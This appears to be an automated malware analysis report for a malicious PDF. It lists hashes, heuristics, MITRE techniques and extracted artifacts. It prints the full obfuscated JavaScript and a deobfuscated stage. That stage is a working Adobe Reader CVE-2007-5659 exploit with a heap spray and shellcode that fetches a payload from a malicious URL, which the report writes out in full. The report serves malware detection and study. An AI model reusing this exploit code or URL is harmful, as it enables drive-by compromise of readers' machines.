Malicious PDF — malware analysis report

Static analysis result for SHA-256 fbd12b10fd3cdd90…

MALICIOUS

PDF

4.7 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-09
MD5: fe15e63a6b02f0ce3dfef2da1d69a919 SHA-1: 4076922a6c14b210f6c5291fd95b13e8ef558325 SHA-256: fbd12b10fd3cdd9008a75cd5729d0762f45e841c788b703f5ff380a5c9bd53ed
308 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.007 JavaScript

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT, PDF_JS, and PDF_EVAL. The eval() call suggests the execution of obfuscated code. The extracted artifact 'javascript_obj0013_001.js' is also flagged as suspicious due to script obfuscation indicators. The primary function of the embedded script appears to be the execution of obfuscated code, likely to download and execute a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function YrqIA(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function I2Ka7A(rLbsKfP0){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(rLbsKfP0)"+";"+"}");eval("function yJVIQbFDyG7TJ(x9um8MOLbXLt){var kvlsq571="+"0,euI8lbd52EJFD=x9um8MOLbXLt.l"+"en"+"gth,HhtKT3FG=10"+"2"+"4,pfUDCp80f3R,z4Qs5fBKtlfaf,shEKq='',uL5CABLqEne2q5=kvlsq571,Dk6FdqvEWvIDAd=kvlsq571,ecP6p=kvlsq571,rBQUy5W=Ar"+"ra"+"y(63,29,3,1,19,30,7 …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://google-moogle.net/fiesta/load.php?id=30417&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x363 6600 bytes
SHA-256: 6220edd66d44560cd4db5844f2a05de38bc37fd77ea2c42f0e09ab3e52fac747
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 169 of 246 identifiers look randomly generated (e.g. 'Qkto6UXtQktoD5ktQkoC6U0oQktV65KtQkto6UFo'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function YrqIA(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function I2Ka7A(rLbsKfP0){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(rLbsKfP0)"+";"+"}");eval("function yJVIQbFDyG7TJ(x9um8MOLbXLt){var kvlsq571="+"0,euI8lbd52EJFD=x9um8MOLbXLt.l"+"en"+"gth,HhtKT3FG=10"+"2"+"4,pfUDCp80f3R,z4Qs5fBKtlfaf,shEKq='',uL5CABLqEne2q5=kvlsq571,Dk6FdqvEWvIDAd=kvlsq571,ecP6p=kvlsq571,rBQUy5W=Ar"+"ra"+"y(63,29,3,1,19,30,7,62,39,44,0,0,0,0,0,0,37,47,56,57,0,18,51,5,33,26,13,12,17,41,55,59,6,54,35,52,46,31,49,20,9,34,22,0,0,0,0,16,0,32,50,23,14,43,36,11,21,10,4,15,8,28,24,61,58,25,2,53,60,45,42,40,27,38,48);f"+"o"+"r(z4Qs5fBKtlfaf=M"+"at"+"h.c"+"ei"+"l(euI8lbd52EJFD/"+"HhtKT3FG)"+";z4Qs5fBKtlfaf>kvlsq571;z4Qs5fBKtlfaf-"+"-){fo"+"r(pfUDCp80f3R=Ma"+"th.m"+"in(euI8lbd52EJFD,HhtKT3FG);pfUDCp80f3R>kvlsq571;pfUDCp80f3R-"+"-,euI8lbd52EJFD-"+"-){ecP6p|"+"=(rBQUy5W[x9um8MOLbXLt.cha"+"rCod"+"eAt(uL5CABLqEne2q5+"+"+)-48])<"+"<Dk6FdqvEWvIDAd;if(Dk6FdqvEWvIDAd){shEKq+"+"=I2Ka7A"+"(74^ecP6p&"+"2"+"5"+"5);ecP6p>"+">="+"8;Dk6FdqvEWvIDAd-"+"="+"2;}el"+"se{Dk6FdqvEWvIDAd="+"6"+";}}"+"}return (shEKq);}var cQktV1=implode('',['vVFiBwy','gb','@8','jmfR6v18IftEkvuDdB9b','KYJZmvV','bkffYkRWrX','v33PmfY6oX_','UmaE2','ejE','3','Ysb','iEjDPpzV','kCqyIO9b','mpBNlaz','H2PK','2DTz','N','nvGRIolblytYI','YsbiEjDPpzVkCLy','XA_Eg7lr','nBq','Nde','K8d7JrlmBa','3FDagt','JZKu','9','Y','j','3aHdmt4','5vGQ','1v','s','bi','EjDPpz','VkCG','NJvsbiE','jDPpzV','k','CMQ','1vsbiE','jDPpzVkCLZ','d0aE','d7aFlfSYnp','qQde','K8d7JrlmBa3FDagthP5RG8I','BtYk0a2Xv','s','biEjDPpzVkCG','8I','N','wPg0','_Ei7KEXf','wPPPw3','KHB4PY','JyIVw','PkeaRI7','_bXKKal2z','Rgv1','8IpX','R5Mwcip@Y5','Mj8','I','t','9rdvXH6omEr','v18I0_','bgC','f','b','iptYnwoQ','k7@8','UCoQk7@8UC','oQk','7@8U','Co','QkpVz2lt','QkC@NUltQktV','c','rFoQkbM6','rFo','QkbM8','5OoQkkz','_5C','oQkka8UCoQk','kaD2g','tQkkl850o','QkKzz2XtQkKzD2','KtQkbH_UKtQkdzaUktQkk','zz','2KtQkt','CN2KtQkkfNrKt','QkF','VDU','7oQk7H62Co','Qk','FVDU7oQktoz2','ooQkkza5Co','Qkkzz','2ltQktCN','2K','tQklK85','CoQkt','u8mo','o','Qkk9NrOoQkps85CoQkkzz5O','oQ','kkzz2KtQkg9D','Ut','oQklKN2lt','Qk','os','8mooQkt','oN5Oo','QkpsN','2','OoQkkzz','5KtQk','kz','z2','KtQkg9DUtoQklKN','2','oo','Qk','X9amoo','Qk','OMNUKtQkp','s65d','tQ','kkza5dtQ','kkzz2K','tQ','kg','9DUtoQklKN2CoQkpM8mooQkpVD5','Oo','Qkps8','mKtQkkz','_5l','tQkkz','z','2KtQ','kg9','DUtoQklK62KtQkBoa','mooQkpuzm','toQkp','sNUo','o','Q','kkzD5','FoQkkzz','2KtQkg9DUto','Q','kgzD2ltQkdS6UKt','Qk','F','uD5X','tQktVN50oQkKSNrgt','Qkkl85toQk','kzz2k','tQkl9N2KtQkFu','D','Uto','Qk','tCcrl','t','Q','kkazr','gtQkktam0oQktC6r','toQkKS6r','gtQ','kps6rFoQkkzDU7oQkkzz2','Kt','Qkbs6rKtQkKt82FoQkFV_rpoQko','X','85ooQkkzz2','KtQktVN2KtQ','kKfNrgtQkBuD','U','7','oQkBVD','UX','tQktV6r','KtQ','kXz','zr','gtQkOM8mooQkkzz2Kt','Qklz','z2Kt','Qkg9DU7oQkb','o','62ltQklzN2dtQkl9DU7oQkps','62o','oQkkzamkt','Qkkzz2','KtQ','kg','9z2XtQkBXcrKtQklfN','2K','tQkX9NmOoQkBX','8m','gtQ','kka','z','rKt','Qkb','uzmooQkkzz2K','tQkFu','z5p','o','Qk','tCc','rK','tQkkfNr','gtQ','k','ktam','0oQ','kt','C','6','rtoQk','KS6rgt','Qkgz','a5ooQkkzz','2KtQkboN2K','tQklSN2boQkg9z2XtQkdf_rl','tQkl','f_57','oQkOM6r','XtQkXz','zmgtQ','klfDrKtQkg9','DU7oQkbo6','2CoQklz','N2','gtQk','l9DU7oQkps','62o','oQkkz','_rXtQ','k','kzz2KtQkkzam0','o','Q','kFuz5poQkt','CcrKtQk','kS','Nr','gtQkkB','am0oQktC6rtoQkKS6r','gt','QkKza5o','oQkkzz2Kt','Q','kboN2KtQktCN5poQk','KzzrgtQkkt','am0oQktC6','rtoQkKS6rgt','Qkkza','5ooQ','kk','zz2KtQ','kgtz2KtQk','lBDr7o','Q','kpoz','2XtQkpoz2XtQkpoz2XtQ','kp','oz2X','tQkp@6U','XtQkltN2ltQktC6r','XtQ','kp','C_50','oQ','klBz','5','bo','QkpVz','5poQktC6rgtQktC8','5CoQkkSNmBoQkla','6U7oQklKN2CoQkF@','DU7oQk','tC8','2','Co','Q','kK9','NmltQkkfzmooQklKN5Xt','QkFJ6U','7oQkkf_rKtQkdf','z5XtQkgz','65','toQ','k7HNrk','tQ','k','B@z2X','tQ','kd','fDrFoQ','kkw','N5Fo','QkKzzU','OoQkOCa20oQkkS','NmltQkB','u65ktQkkfz2Bo','Qkgzz5dtQ','kOoa5','7oQkOu827oQkFuDr','OoQklt85g','t','QkpC6U7oQklt6U7','oQkkf_','rl','tQkbJc5BoQkk','f6U7oQkt','C','N','r7','oQkKf6r0','oQ','kC','H','N2XtQkkaDU7o','Qk','kfDU7o','Qkl965gt','QkBCDrBo','Qkk','zz2','ooQkOH','a','5ooQk','O','MN','5O','oQkl','9z5p','oQkg','f6rdt','QkgwNrBoQkk','z','zrOoQ','koC6UboQkoMcU7oQkBV','_5gtQkts6','5','KtQktVDUKtQkt@DUooQk','B','CD','U0oQktVDUdtQkts6UKt','Qkto6UXtQktoD5ktQkoC6U0oQktV65KtQkto6UFoQkoCcUCoQk','BV','D','UOoQkt','VDUXtQk','tC6','UOoQk','o','M65ktQ','koM6Ub','oQ','kt','Jc5KtQk','CCD','U7oQkCMc5Co','Q','kCuc57oQkBVc5ooQkoMcUCoQkCC','DU','XtQkpMc57HQ','n','VMPkeaRIy','t','bl','b','sFPIaR','U2S','R','jkw','Q1vM8K7M8','5','pM','85VMPke','aRIGSYlr','S','N5qfbmB','B3','gv18','IEBLk8fDqyt','rXu','BRlv','3yIB','G8','It9rdvuF','iFMR','U','RDr','6d','nzKDBrU','v18Iyt','bl','bsFPI','aRU2S','RjkwQq','v','XZ3','ulYDoucPMK6d5zEnpX45b','JZm','vVFiBwZgelLDnw260f8INMQkftEdM9YdAlPI','AoFmpJ85A','oFmpJ','85wJZmvsb','iEjDP','p','zVk','CMQ1v33Pm','fY6oX_UmaE2ejE3Ys','b','iEjD','PpzV','kCqyIO9','b','mpB','NlazH2PK2DTz','NnVMPke','aRI','@SNmB','JRI','N','Myn','7','_bXKKal2zRgv1yI','pXRUp','M','85p','MNn@qbgRl','ckxw3d7J_kEt_mvV','E','XBwy','nt9rdvXRj','x','D','D','rmK8PBlHPw93','dNMcmblVPDaD6','FM3dEw3ixaR1','@SNmBJ','4mblVPDa','D6FM3dE','w3i','xa4','nHJyIVwygb@8jm','fR6LlRjxDDrmK','8P','BlHPw9','3','dcwQ1vsbiE','jD','Ppz','Vk','CMZnvXH6omErV','MQJ','v1R','I9t2XMB','Fl@_','YIez6lg','t3ik_Yjyf6','2YJy','IV','w','PkeaR','I','l','lFXp','lF2qS','cUom','r3v18Ie','wRdf','V','F','lA','SF','gBzVgBfFl@_rq7WEP7aF','lfSYnR','G8Ill','FXplF','2q','Sc','Uomr3v18IllFXplF2qScU','o','mr3fH','FgpnbiMtYn@','qH2@sYq','wHQnVMPkeaRI','rzHUBl_Xo96Knfb2KwQ1v','LbgowQrBaFiFlPr','bmYd','bt','_','Posc','k8_DqMlbiB9','akYMNnyH','aK8','wRK','kfLUosFXj_ZiY9rdgBRnOJ','yqllFXpl','F2q','ScUomr3f@Yl','eaFr7lP','5RJ','Z','mvJrgvXynrzHUBl','_Xo96','Knf','b','2KjH5','cw','Q1NM','ymvVPxv','XynrzHUBl_','Xo96Knfb2KjV','5cw','Q','1NMQ5vVPxvXD67HR','D@SF5z','a','Likz_jB1HIQMP5RM','yJ','QwyD','mB6','drWEkO32PMtD2L9N','G','vq8','IOJQnvq','R','JvXy','Dm','B6d','rWEkO32','PMtD2LwNGv1N1v','s8I9V','yIr','zHU','B','l_Xo9','6Knf','b2','KjV5cw','y1vuNnvqRJvXy','DmB6drWEkO32PM','tD2LwNGvq8IoJ','Qnv','GRIn','na','PzjY','kqlQnV','MP','kea','RI','ql_3m98INMQkftEdM9Y','dAl','PI','AoR','5MwciAo','R5','M','wc','i','wJZ','mvs','R','lR','nbg','Y@','HDGzV5','fqbg','fSYkYwy','1vC8U','Fo65','R','MZPr','WD6','OMZn','NMZPrWD6','OG8','I','7lblC_Zi@nYXe','a','E','P7WrdAwQ1v@_Xy','nbi','w_','Zi@nYXAfYkkmbiRnbDfzEXYG4d0a','rl','zMPIwqQXCS','rmv','@HDG','zV5N','KZmv1R','INwQi','t3brUa','b2flHXCV','anRG6']);");eval(yJVIQbFDyG7TJ(cQktV1));}
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x363 2675 bytes
SHA-256: ffb6d09a4fb7b00f29a788701c7e62b15473ecfdb31b81577732a59f42d200da
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var d83XVsT = new Array(); function ZRVcT7H7VbGakO(gaXKRpVu3, qa9p4ijVDLyJd6) { while (gaXKRpVu3.length*2<qa9p4ijVDLyJd6){gaXKRpVu3 += gaXKRpVu3;} gaXKRpVu3 = gaXKRpVu3.substring(0,qa9p4ijVDLyJd6/2); return gaXKRpVu3; } function RLPzktS() { var tnmFIhIvd = 0x0c0c0c0c; var XTwmC = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u672F%u6F6F%u6C67%u2D65%u6F6D%u676F%u656C%u6E2E%u7465%u662F%u6569%u7473%u2F61%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3033%u3134%u2637%u7073%u3D6C%u0034"); var lei8wQPr4IwXE = 0x400000; var OghH71Sc9rTf = XTwmC.length * 2; var qa9p4ijVDLyJd6 = lei8wQPr4IwXE - (OghH71Sc9rTf+0x38); var gaXKRpVu3 = unescape("%u9090%u9090"); gaXKRpVu3 = ZRVcT7H7VbGakO(gaXKRpVu3, qa9p4ijVDLyJd6); var o792y = (tnmFIhIvd - 0x400000)/lei8wQPr4IwXE; for (var xXQJBV9PrXPbQr=0;xXQJBV9PrXPbQr<o792y;xXQJBV9PrXPbQr++) { d83XVsT[xXQJBV9PrXPbQr] = gaXKRpVu3 + XTwmC; } } function a6jAUbEnXl3F() { var BxmpxES77wmN = app.viewerVersion.toString(); BxmpxES77wmN = BxmpxES77wmN.replace(/\D/g,""); var HV4rHow1zRcEF = new Array(BxmpxES77wmN.charAt(0),BxmpxES77wmN.charAt(1),BxmpxES77wmN.charAt(2)); if ((HV4rHow1zRcEF[0] == 8 && ((HV4rHow1zRcEF[1] == 1 && HV4rHow1zRcEF[2] < 2) || HV4rHow1zRcEF[1] < 1)) || (HV4rHow1zRcEF[0] == 7 && HV4rHow1zRcEF[1] < 1) || (HV4rHow1zRcEF[0] < 7)) { RLPzktS(); var SHOV1 = unescape("%u0c0c%u0c0c"); while(SHOV1.length < 44952) SHOV1 += SHOV1; this.collabStore = Collab.collectEmailInfo({subj: "",msg: SHOV1}); } } a6jAUbEnXl3F();

Open this report in the interactive analyzer, or submit your own file for analysis.